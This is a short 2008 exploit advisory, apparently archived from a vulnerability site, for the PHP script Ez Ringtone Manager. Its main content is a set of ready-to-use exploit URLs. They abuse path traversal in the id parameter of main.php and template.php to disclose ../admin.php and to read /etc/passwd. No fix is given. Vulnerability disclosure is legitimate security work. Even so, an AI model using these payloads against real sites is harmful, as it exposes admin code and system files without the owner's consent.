Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities

2008-11-22 06:30:49

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Ez Ringtone Manager Multiple Vulnerabilities +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 22 nov 2008
SITE : WwW.DeltaHacking.Net


#####################################################

APPLICATION : Ez Ringtone Manager
DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
VENDOR : http://www.scriptsez.net/
DEMO : http://demo.scriptsez.net/ringtones/demo.html

#####################################################


[+] vuln : ./main.php
./template.php


vulnerability is in main.php that included in template.php


[1] Remote File Disclosure:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
http://victim.com/ringtones/template.php?action=detail&id=../admin.php

[2] Local File Inclusion:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #

##########################################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.